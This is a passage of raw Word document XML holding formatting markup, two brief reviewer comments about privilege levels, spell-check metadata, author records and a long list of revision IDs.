      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="315EBF70" w14:textId="2D70042A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2E3F5C42" w14:textId="343F212E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1646DB36" w14:textId="08915AA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="323BECDD" w14:textId="4961E292">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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DL" w:author="Drew Scott Levy" w:date="2025-10-05T22:14:21" w:id="898675367">
    <w:p xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:rsidR="30F83EB9" w:rsidRDefault="6AF131B2" w14:paraId="6179CD62" w14:textId="47D8083C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="35AC3C62" w:rsidR="066681A6">
        <w:t>could be low privileges also - Dhruv</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:initials="AG" w:author="Andy Gu" w:date="2025-10-12T13:13:49" w:id="846705011">
    <w:p xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:rsidR="23E5244E" w:rsidRDefault="34BD3E3C" w14:paraId="37EAAE46" w14:textId="5CC25197">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="18CC8211" w:rsidR="3198CA3E">
        <w:t>Could be no privileges</w:t>
      </w:r>
    </w:p>
  </w:comment>
</w:comments>
</file>

<file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
<w15:commentsEx xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w15">
  <w15:commentEx w15:done="0" w15:paraId="6179CD62"/>
  <w15:commentEx w15:done="0" w15:paraId="37EAAE4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5D5C4C2" w16cex:dateUtc="2025-10-06T05:14:21.097Z"/>
  <w16cex:commentExtensible w16cex:durableId="2763ECF9" w16cex:dateUtc="2025-10-12T20:13:49.586Z"/>
</w16cex:commentsExtensible>
</file>

<file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
<w16cid:commentsIds xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" mc:Ignorable="w16cid">
  <w16cid:commentId w16cid:paraId="6179CD62" w16cid:durableId="65D5C4C2"/>
  <w16cid:commentId w16cid:paraId="37EAAE46" w16cid:durableId="2763ECF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5qWkwiR6It58GH" int2:id="AwzAppJu">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="s9KZQusNPfeYUu" int2:id="i58kPYHM">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="Yv/hdoHbYxXLt8" int2:id="sBRdT86B">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="WbVVyCHFLXo2rj" int2:id="dsz9qhnN">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="fbsqj6ftjoZe9x" int2:id="2Uib72y6">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="WLrxXVEC9LuZmZ" int2:id="SRAgs56g">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="zVs4NJqLZNgr67" int2:id="QeeBhNMr">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="jFguC1aDjsPvWr" int2:id="x9c5anYc">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="8Vt8Np4iv1sygO" int2:id="p6Oyf8cQ">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="hnBnYe4jPH0++A" int2:id="F27Pl1X3">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="tPIodnJeR4XyPK" int2:id="y1wjw6ZE">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="iKc6WgwnSULccH" int2:id="nFqq4IyX">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="N8D6+6Do15vyTj" int2:id="k4pKcOkb">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="UfHv7C5iOP3JGB" int2:id="IA470QJF">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="wk0ObnR0RLdJNa" int2:id="jlPw1XnD">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="k1ny48Vj+a9nBR" int2:id="uR4bsVsy">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="3iLsbNxCxDDrR/" int2:id="lkyy5RLA">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="cpEZABqDyV2icQ" int2:id="amGyKFz7">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="RXuiFL1utn2P83" int2:id="psoscZvG">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="reMdCYxzfNcr+S" int2:id="MY5D4bEp">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="2jmj7l5rSw0yVb" int2:id="TdFFs8Vs">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="Vqz84TZ3iOdaJW" int2:id="J5eXAgC2">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="6oH72KAgpFtzfV" int2:id="l7gwhuOu">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="qt1haEsG5yPOAF" int2:id="YAWeL4mO">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="a+pujdViKHdYLa" int2:id="LLGYII6F">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="cRjpEaScYq0eLY" int2:id="kU303d9C"/>
    <int2:textHash int2:hashCode="Cv+wpglHkwcB6R" int2:id="3AC0pxNf">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="eV/GrPhdfzdxZw" int2:id="jazth0We">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="dVMRhJaRj1TQda" int2:id="PGbGlXT1">
      <int2:state int2:type="spell" int2:value="Rejected"/>
    </int2:textHash>
    <int2:bookmark int2:bookmarkName="_Int_byoszga7" int2:invalidationBookmarkName="" int2:hashCode="c1rVccGJ17qERk" int2:id="dB50efRs">
      <int2:state int2:type="gram" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_gQRwIkJG" int2:invalidationBookmarkName="" int2:hashCode="aJcKlbSmPyk8ri" int2:id="W0IAAl94">
      <int2:state int2:type="gram" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_7ScIOFDJ" int2:invalidationBookmarkName="" int2:hashCode="mBVskVTCrCzeYt" int2:id="PG8I5V9a">
      <int2:state int2:type="gram" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_arULHQZ5" int2:invalidationBookmarkName="" int2:hashCode="R1RwGhAR2e8LiH" int2:id="t9spZayM">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31">
    <w:nsid w:val="27299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51a6b4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79518a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2667a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246aba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15e63f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5">
    <w:nsid w:val="79e299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cc973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3">
    <w:nsid w:val="1c0034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2">
    <w:nsid w:val="7fda73d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7a51293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2185777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1f7675f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8">
    <w:nsid w:val="6bbc1a5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5613ed4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1771b9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2682ba9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625d8b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5d5f0d9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40283d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3206c6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429969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18d3126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114f6b9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722d2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554878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ce01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0c144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40c52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3e8248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55776d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12d0d3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1d109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fcf77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4cc5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fc79b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458e37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36ef15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c90335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1145d7a"/>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1">
    <w:nsid w:val="24f89f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4512a44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9">
    <w:nsid w:val="7b4f446b"/>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244c58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689d3d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6890669"/>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68eae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53b053b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9a66a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42fdc5a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97e49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7a757020"/>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9">
    <w:nsid w:val="942d29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e9979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4dc1c2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25e47a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49924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575583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fd01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9f48b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26b71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89178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113ad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5c3a8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67984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cd703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af69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6b073b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21930e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f40ee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2be01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166c5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a5761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180808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974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1b0e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c8b84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f6131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7ee80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37768a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1a43f4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3de06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cb38f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38eff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7620a9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cef83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12a223b1"/>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44">
    <w:nsid w:val="3c8e7a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3421ff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7ce1e7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27e5cd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e38e4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634a8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4143e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3e5b9d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f2c09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4f104f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8c9a7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232035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76e099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d4d8a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281dec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060c5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41c267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ed8e5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c3217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50c8e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56534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3ada7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d4c9d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fbc1a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7ff994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eb755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f50980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649e19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df2b7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31bfd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98f13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8043a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ce45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1626d4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1af52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56710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75ae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f3467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457b3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5e1ce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d391a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85755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b99494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1c97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Drew Scott Levy">
    <w15:presenceInfo w15:providerId="AD" w15:userId="S::dslevy@ad.uci.edu::f69d986b-c3e2-45cb-b82f-09bc8e3cba24"/>
  </w15:person>
  <w15:person w15:author="Andy Gu">
    <w15:presenceInfo w15:providerId="AD" w15:userId="S::gua6@ad.uci.edu::25c9b994-1127-441d-8b9a-fe9a2d30da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244F763"/>
    <w:rsid w:val="0001CFAE"/>
    <w:rsid w:val="0003EE71"/>
    <w:rsid w:val="0007635C"/>
    <w:rsid w:val="00089F98"/>
    <w:rsid w:val="001A641D"/>
    <w:rsid w:val="001D370B"/>
    <w:rsid w:val="00259E87"/>
    <w:rsid w:val="00343134"/>
    <w:rsid w:val="003CE239"/>
    <w:rsid w:val="004001A6"/>
    <w:rsid w:val="0042F165"/>
    <w:rsid w:val="0043D2E1"/>
    <w:rsid w:val="004736A2"/>
    <w:rsid w:val="004C9138"/>
    <w:rsid w:val="0061D464"/>
    <w:rsid w:val="0074796B"/>
    <w:rsid w:val="00915684"/>
    <w:rsid w:val="009E7A4C"/>
    <w:rsid w:val="00A64644"/>
    <w:rsid w:val="00A7C82C"/>
    <w:rsid w:val="00A8020D"/>
    <w:rsid w:val="00CA94DE"/>
    <w:rsid w:val="00D226D3"/>
    <w:rsid w:val="00D2817C"/>
    <w:rsid w:val="00DB7587"/>
    <w:rsid w:val="00DECB37"/>
    <w:rsid w:val="00E73482"/>
    <w:rsid w:val="00E9C4B7"/>
    <w:rsid w:val="00EBB079"/>
    <w:rsid w:val="00F15183"/>
    <w:rsid w:val="00F5259A"/>
    <w:rsid w:val="00F67F35"/>
    <w:rsid w:val="00F96C2F"/>
    <w:rsid w:val="00FAB549"/>
    <w:rsid w:val="0103A4C9"/>
    <w:rsid w:val="010AB3F8"/>
    <w:rsid w:val="011A5ADF"/>
    <w:rsid w:val="0126F3F4"/>
    <w:rsid w:val="01284A3D"/>
    <w:rsid w:val="012896BB"/>
    <w:rsid w:val="0129E4C2"/>
    <w:rsid w:val="012E5BD6"/>
    <w:rsid w:val="014B4A36"/>
    <w:rsid w:val="014E7641"/>
    <w:rsid w:val="01540C5A"/>
    <w:rsid w:val="016008EE"/>
    <w:rsid w:val="0179D454"/>
    <w:rsid w:val="017FCA6F"/>
    <w:rsid w:val="01807088"/>
    <w:rsid w:val="019AD089"/>
    <w:rsid w:val="01A8B483"/>
    <w:rsid w:val="01AB5629"/>
    <w:rsid w:val="01B04E8A"/>
    <w:rsid w:val="01B16944"/>
    <w:rsid w:val="01B4A7B0"/>
    <w:rsid w:val="01C141A8"/>
    <w:rsid w:val="01C6BA00"/>
    <w:rsid w:val="01C7FDB4"/>
    <w:rsid w:val="01CA86F4"/>
    <w:rsid w:val="01D34FFB"/>
    <w:rsid w:val="01DE510D"/>
    <w:rsid w:val="01E2AE68"/>
    <w:rsid w:val="01E9C3A2"/>
    <w:rsid w:val="01EB2F8F"/>
    <w:rsid w:val="01ECEFE9"/>
    <w:rsid w:val="02067248"/>
    <w:rsid w:val="02175549"/>
    <w:rsid w:val="02213E2F"/>
    <w:rsid w:val="022BD344"/>
    <w:rsid w:val="022FFBBB"/>
    <w:rsid w:val="023DC0E1"/>
    <w:rsid w:val="02405E8A"/>
    <w:rsid w:val="0243C261"/>
    <w:rsid w:val="0245C269"/>
    <w:rsid w:val="024C7491"/>
    <w:rsid w:val="025270D4"/>
    <w:rsid w:val="02566357"/>
    <w:rsid w:val="0256C381"/>
    <w:rsid w:val="025AA175"/>
    <w:rsid w:val="025CC8FB"/>
    <w:rsid w:val="02656D5F"/>
    <w:rsid w:val="02656D5F"/>
    <w:rsid w:val="0267AF26"/>
    <w:rsid w:val="026A87B1"/>
    <w:rsid w:val="026DB335"/>
    <w:rsid w:val="0274F89A"/>
    <w:rsid w:val="0275CD4E"/>
    <w:rsid w:val="027B8F67"/>
    <w:rsid w:val="027C6283"/>
    <w:rsid w:val="0280701E"/>
    <w:rsid w:val="02819F2D"/>
    <w:rsid w:val="0284CA5D"/>
    <w:rsid w:val="028AC263"/>
    <w:rsid w:val="028BB1F6"/>
    <w:rsid w:val="02A281A2"/>
    <w:rsid w:val="02A68C74"/>
    <w:rsid w:val="02D28657"/>
    <w:rsid w:val="02E50FD5"/>
    <w:rsid w:val="02E930C1"/>
    <w:rsid w:val="02ECE04D"/>
    <w:rsid w:val="03041E99"/>
    <w:rsid w:val="0312474B"/>
    <w:rsid w:val="0314A806"/>
    <w:rsid w:val="0318AF73"/>
    <w:rsid w:val="0319958E"/>
    <w:rsid w:val="031AD174"/>
    <w:rsid w:val="03278A04"/>
    <w:rsid w:val="0328901F"/>
    <w:rsid w:val="0328EF9A"/>
    <w:rsid w:val="032DC8D2"/>
    <w:rsid w:val="033241F0"/>
    <w:rsid w:val="0334BDC8"/>
    <w:rsid w:val="03362F38"/>
    <w:rsid w:val="033CD0DC"/>
    <w:rsid w:val="033E8AA5"/>
    <w:rsid w:val="034635A8"/>
    <w:rsid w:val="034C52C6"/>
    <w:rsid w:val="03506F33"/>
    <w:rsid w:val="03518680"/>
    <w:rsid w:val="03552119"/>
    <w:rsid w:val="03739B7A"/>
    <w:rsid w:val="03776728"/>
    <w:rsid w:val="038165C2"/>
    <w:rsid w:val="03844F28"/>
    <w:rsid w:val="0386383F"/>
    <w:rsid w:val="0396D36A"/>
    <w:rsid w:val="0397B8DC"/>
    <w:rsid w:val="0398E637"/>
    <w:rsid w:val="03A3FBB4"/>
    <w:rsid w:val="03A5A8FB"/>
    <w:rsid w:val="03AF82E6"/>
    <w:rsid w:val="03B32E76"/>
    <w:rsid w:val="03BD4BED"/>
    <w:rsid w:val="03C1C368"/>
    <w:rsid w:val="03C32A1D"/>
    <w:rsid w:val="03CC7666"/>
    <w:rsid w:val="03D5420D"/>
    <w:rsid w:val="03D8BE6C"/>
    <w:rsid w:val="03D8D5C9"/>
    <w:rsid w:val="03DBF4E7"/>
    <w:rsid w:val="03E0AD5D"/>
    <w:rsid w:val="03F06492"/>
    <w:rsid w:val="03F78FAD"/>
    <w:rsid w:val="03FCFB07"/>
    <w:rsid w:val="04008D3B"/>
    <w:rsid w:val="0404045F"/>
    <w:rsid w:val="040AF433"/>
    <w:rsid w:val="040C3987"/>
    <w:rsid w:val="0410BD0D"/>
    <w:rsid w:val="041C164C"/>
    <w:rsid w:val="04354721"/>
    <w:rsid w:val="04358766"/>
    <w:rsid w:val="0436DD2D"/>
    <w:rsid w:val="0439D976"/>
    <w:rsid w:val="044323BF"/>
    <w:rsid w:val="04576A09"/>
    <w:rsid w:val="045E84AF"/>
    <w:rsid w:val="045F9906"/>
    <w:rsid w:val="0462FBE7"/>
    <w:rsid w:val="0463467D"/>
    <w:rsid w:val="04702221"/>
    <w:rsid w:val="04782383"/>
    <w:rsid w:val="047BE766"/>
    <w:rsid w:val="04829DAB"/>
    <w:rsid w:val="048B8DDE"/>
    <w:rsid w:val="04947ACF"/>
    <w:rsid w:val="0495C60A"/>
    <w:rsid w:val="049670FC"/>
    <w:rsid w:val="049826A0"/>
    <w:rsid w:val="049F22DF"/>
    <w:rsid w:val="049FF7DB"/>
    <w:rsid w:val="04A8854D"/>
    <w:rsid w:val="04AD7E55"/>
    <w:rsid w:val="04B4FB67"/>
    <w:rsid w:val="04C87CE8"/>
    <w:rsid w:val="04D5F735"/>
    <w:rsid w:val="04EE9B0E"/>
    <w:rsid w:val="04F1023C"/>
    <w:rsid w:val="04F1B012"/>
    <w:rsid w:val="0507509B"/>
    <w:rsid w:val="0509EF28"/>
    <w:rsid w:val="0523DF98"/>
    <w:rsid w:val="052D4230"/>
    <w:rsid w:val="055086DC"/>
    <w:rsid w:val="0565C0C9"/>
    <w:rsid w:val="057A3CC3"/>
    <w:rsid w:val="059CFD53"/>
    <w:rsid w:val="059E2AF5"/>
    <w:rsid w:val="05A2DB1E"/>
    <w:rsid w:val="05AB5257"/>
    <w:rsid w:val="05B59082"/>
    <w:rsid w:val="05B96903"/>
    <w:rsid w:val="05C74CF3"/>
    <w:rsid w:val="05D58348"/>
    <w:rsid w:val="05DA6A66"/>
    <w:rsid w:val="05DF3699"/>
    <w:rsid w:val="05ED4963"/>
    <w:rsid w:val="05F65BD6"/>
    <w:rsid w:val="05F72773"/>
    <w:rsid w:val="05F9B973"/>
    <w:rsid w:val="05FB49DF"/>
    <w:rsid w:val="061A52FE"/>
    <w:rsid w:val="06266D18"/>
    <w:rsid w:val="0626B0B0"/>
    <w:rsid w:val="0629A399"/>
    <w:rsid w:val="06389AF7"/>
    <w:rsid w:val="063E77EA"/>
    <w:rsid w:val="06470B67"/>
    <w:rsid w:val="06507703"/>
    <w:rsid w:val="0655A541"/>
    <w:rsid w:val="0656F514"/>
    <w:rsid w:val="06672ACC"/>
    <w:rsid w:val="06895241"/>
    <w:rsid w:val="069CBF2D"/>
    <w:rsid w:val="06A31DEB"/>
    <w:rsid w:val="06A3D7A2"/>
    <w:rsid w:val="06B861C5"/>
    <w:rsid w:val="06B8B8C2"/>
    <w:rsid w:val="06C25059"/>
    <w:rsid w:val="06D32307"/>
    <w:rsid w:val="06D366C2"/>
    <w:rsid w:val="06D59007"/>
    <w:rsid w:val="06D8400C"/>
    <w:rsid w:val="06DC913C"/>
    <w:rsid w:val="06E078D1"/>
    <w:rsid w:val="06EB559F"/>
    <w:rsid w:val="06ECD073"/>
    <w:rsid w:val="06EE7E97"/>
    <w:rsid w:val="06EF0B4C"/>
    <w:rsid w:val="06F0CE5E"/>
    <w:rsid w:val="06F34C80"/>
    <w:rsid w:val="06F6F414"/>
    <w:rsid w:val="06F9BF30"/>
    <w:rsid w:val="0701B212"/>
    <w:rsid w:val="07042A0E"/>
    <w:rsid w:val="0713F750"/>
    <w:rsid w:val="0718F99B"/>
    <w:rsid w:val="0719C3D7"/>
    <w:rsid w:val="071D79C4"/>
    <w:rsid w:val="072E9829"/>
    <w:rsid w:val="0732BFE4"/>
    <w:rsid w:val="07337F61"/>
    <w:rsid w:val="073AA045"/>
    <w:rsid w:val="073E341E"/>
    <w:rsid w:val="074F9495"/>
    <w:rsid w:val="07608DE9"/>
    <w:rsid w:val="0761BF1B"/>
    <w:rsid w:val="07675DC8"/>
    <w:rsid w:val="07801C36"/>
    <w:rsid w:val="07926EE5"/>
    <w:rsid w:val="07A61544"/>
    <w:rsid w:val="07AB961D"/>
    <w:rsid w:val="07AC173E"/>
    <w:rsid w:val="07B0BA37"/>
    <w:rsid w:val="07B7CE57"/>
    <w:rsid w:val="07C12D50"/>
    <w:rsid w:val="07C493D4"/>
    <w:rsid w:val="07F07DBA"/>
    <w:rsid w:val="07F8AA66"/>
    <w:rsid w:val="081D49C5"/>
    <w:rsid w:val="081DB361"/>
    <w:rsid w:val="082E079F"/>
    <w:rsid w:val="083B1EE5"/>
    <w:rsid w:val="083DC3AC"/>
    <w:rsid w:val="0841D991"/>
    <w:rsid w:val="084FE937"/>
    <w:rsid w:val="085BEA13"/>
    <w:rsid w:val="086C9EFC"/>
    <w:rsid w:val="0872C40B"/>
    <w:rsid w:val="08752808"/>
    <w:rsid w:val="0879D9AD"/>
    <w:rsid w:val="087CCE1E"/>
    <w:rsid w:val="087EC2C1"/>
    <w:rsid w:val="08947F3D"/>
    <w:rsid w:val="0897FC38"/>
    <w:rsid w:val="08982725"/>
    <w:rsid w:val="089E490A"/>
    <w:rsid w:val="08BD4A4E"/>
    <w:rsid w:val="08C77B0F"/>
    <w:rsid w:val="08D69941"/>
    <w:rsid w:val="08D81ADD"/>
    <w:rsid w:val="08DBC504"/>
    <w:rsid w:val="08DD66F7"/>
    <w:rsid w:val="08E88510"/>
    <w:rsid w:val="08EE586C"/>
    <w:rsid w:val="08F481C8"/>
    <w:rsid w:val="09021514"/>
    <w:rsid w:val="090256DA"/>
    <w:rsid w:val="090535C0"/>
    <w:rsid w:val="090865F8"/>
    <w:rsid w:val="090A76DC"/>
    <w:rsid w:val="0912D3D3"/>
    <w:rsid w:val="0914F5C8"/>
    <w:rsid w:val="091BE9B5"/>
    <w:rsid w:val="0924A85F"/>
    <w:rsid w:val="092B6FEA"/>
    <w:rsid w:val="092B9B4C"/>
    <w:rsid w:val="09311489"/>
    <w:rsid w:val="09351B01"/>
    <w:rsid w:val="09352DD0"/>
    <w:rsid w:val="093562E7"/>
    <w:rsid w:val="093B8A10"/>
    <w:rsid w:val="093C68B5"/>
    <w:rsid w:val="0940FBFC"/>
    <w:rsid w:val="09486245"/>
    <w:rsid w:val="095B7D29"/>
    <w:rsid w:val="09638C5D"/>
    <w:rsid w:val="09648BC6"/>
    <w:rsid w:val="0969DBB9"/>
    <w:rsid w:val="096A9221"/>
    <w:rsid w:val="096D4CDF"/>
    <w:rsid w:val="09708EC3"/>
    <w:rsid w:val="097ED03D"/>
    <w:rsid w:val="09953A4A"/>
    <w:rsid w:val="09A1F806"/>
    <w:rsid w:val="09A860A3"/>
    <w:rsid w:val="09B1DFDF"/>
    <w:rsid w:val="09B264D1"/>
    <w:rsid w:val="09BA4D82"/>
    <w:rsid w:val="09BE4539"/>
    <w:rsid w:val="09C22703"/>
    <w:rsid w:val="09CB998A"/>
    <w:rsid w:val="09CBA97A"/>
    <w:rsid w:val="09E8DAF2"/>
    <w:rsid w:val="09FE2B18"/>
    <w:rsid w:val="09FFB665"/>
    <w:rsid w:val="0A003F01"/>
    <w:rsid w:val="0A0452C9"/>
    <w:rsid w:val="0A179A2A"/>
    <w:rsid w:val="0A1DE55F"/>
    <w:rsid w:val="0A20A2D1"/>
    <w:rsid w:val="0A2D93BA"/>
    <w:rsid w:val="0A353543"/>
    <w:rsid w:val="0A3BD630"/>
    <w:rsid w:val="0A41414C"/>
    <w:rsid w:val="0A4D8369"/>
    <w:rsid w:val="0A56AE24"/>
    <w:rsid w:val="0A5BA465"/>
    <w:rsid w:val="0A606EA4"/>
    <w:rsid w:val="0A770A40"/>
    <w:rsid w:val="0A77908F"/>
    <w:rsid w:val="0A83AF37"/>
    <w:rsid w:val="0A89890C"/>
    <w:rsid w:val="0AA7250F"/>
    <w:rsid w:val="0AAE0D00"/>
    <w:rsid w:val="0AAE73C6"/>
    <w:rsid w:val="0ABA193D"/>
    <w:rsid w:val="0ACE1A24"/>
    <w:rsid w:val="0AD2E6E8"/>
    <w:rsid w:val="0ADEC20B"/>
    <w:rsid w:val="0AE68F4A"/>
    <w:rsid w:val="0AE7A367"/>
    <w:rsid w:val="0AF43C11"/>
    <w:rsid w:val="0AF48208"/>
    <w:rsid w:val="0B006A2C"/>
    <w:rsid w:val="0B009ED0"/>
    <w:rsid w:val="0B0238F6"/>
    <w:rsid w:val="0B059F65"/>
    <w:rsid w:val="0B11B1B2"/>
    <w:rsid w:val="0B238FCD"/>
    <w:rsid w:val="0B23FB7A"/>
    <w:rsid w:val="0B414EFB"/>
    <w:rsid w:val="0B491403"/>
    <w:rsid w:val="0B4B73C2"/>
    <w:rsid w:val="0B7417AA"/>
    <w:rsid w:val="0B74E187"/>
    <w:rsid w:val="0B7BB8C5"/>
    <w:rsid w:val="0B82A6A2"/>
    <w:rsid w:val="0B82E4E1"/>
    <w:rsid w:val="0B8593A1"/>
    <w:rsid w:val="0B8FBB53"/>
    <w:rsid w:val="0B99F504"/>
    <w:rsid w:val="0BAC99AB"/>
    <w:rsid w:val="0BB80E56"/>
    <w:rsid w:val="0BBC5271"/>
    <w:rsid w:val="0BC5E380"/>
    <w:rsid w:val="0BD871CA"/>
    <w:rsid w:val="0BD8A04E"/>
    <w:rsid w:val="0BD97B80"/>
    <w:rsid w:val="0BE25419"/>
    <w:rsid w:val="0BF649B1"/>
    <w:rsid w:val="0BFF8CA1"/>
    <w:rsid w:val="0C1425C0"/>
    <w:rsid w:val="0C22D4A8"/>
    <w:rsid w:val="0C240BD6"/>
    <w:rsid w:val="0C2596E1"/>
    <w:rsid w:val="0C398E24"/>
    <w:rsid w:val="0C3BF351"/>
    <w:rsid w:val="0C41A898"/>
    <w:rsid w:val="0C49A0C3"/>
    <w:rsid w:val="0C4E1D2B"/>
    <w:rsid w:val="0C4F67AF"/>
    <w:rsid w:val="0C5C6372"/>
    <w:rsid w:val="0C60E788"/>
    <w:rsid w:val="0C643487"/>
    <w:rsid w:val="0C678967"/>
    <w:rsid w:val="0C67BC47"/>
    <w:rsid w:val="0C747C12"/>
    <w:rsid w:val="0C7984F3"/>
    <w:rsid w:val="0C7F6DAB"/>
    <w:rsid w:val="0C820E9E"/>
    <w:rsid w:val="0C90034F"/>
    <w:rsid w:val="0C922FB9"/>
    <w:rsid w:val="0C9321CB"/>
    <w:rsid w:val="0CA28589"/>
    <w:rsid w:val="0CA9869E"/>
    <w:rsid w:val="0CAD4869"/>
    <w:rsid w:val="0CB51999"/>
    <w:rsid w:val="0CCA8AC4"/>
    <w:rsid w:val="0CCC15DA"/>
    <w:rsid w:val="0CD1EDFF"/>
    <w:rsid w:val="0CD70469"/>
    <w:rsid w:val="0CDF3CF3"/>
    <w:rsid w:val="0CE92728"/>
    <w:rsid w:val="0CF95212"/>
    <w:rsid w:val="0CFC4B18"/>
    <w:rsid w:val="0D1033D6"/>
    <w:rsid w:val="0D127278"/>
    <w:rsid w:val="0D23B725"/>
    <w:rsid w:val="0D2A80BB"/>
    <w:rsid w:val="0D325B6E"/>
    <w:rsid w:val="0D44FA60"/>
    <w:rsid w:val="0D491E33"/>
    <w:rsid w:val="0D514F22"/>
    <w:rsid w:val="0D534078"/>
    <w:rsid w:val="0D5617FB"/>
    <w:rsid w:val="0D58CE82"/>
    <w:rsid w:val="0D59C4A6"/>
    <w:rsid w:val="0D72ABE5"/>
    <w:rsid w:val="0D73A4B0"/>
    <w:rsid w:val="0D7D35DB"/>
    <w:rsid w:val="0D8FC523"/>
    <w:rsid w:val="0D92636C"/>
    <w:rsid w:val="0D94F812"/>
    <w:rsid w:val="0D97A995"/>
    <w:rsid w:val="0D9CB8DE"/>
    <w:rsid w:val="0D9E8666"/>
    <w:rsid w:val="0DA0017E"/>
    <w:rsid w:val="0DA0B87A"/>
    <w:rsid w:val="0DBEE02E"/>
    <w:rsid w:val="0DC68283"/>
    <w:rsid w:val="0DC83390"/>
    <w:rsid w:val="0DDC0485"/>
    <w:rsid w:val="0DE1FC31"/>
    <w:rsid w:val="0DE7CBED"/>
    <w:rsid w:val="0DECC472"/>
    <w:rsid w:val="0DF1B00B"/>
    <w:rsid w:val="0E0AE766"/>
    <w:rsid w:val="0E1E1D44"/>
    <w:rsid w:val="0E1E5A5F"/>
    <w:rsid w:val="0E23A253"/>
    <w:rsid w:val="0E2CCFFA"/>
    <w:rsid w:val="0E358166"/>
    <w:rsid w:val="0E37E395"/>
    <w:rsid w:val="0E3D71A3"/>
    <w:rsid w:val="0E4A7900"/>
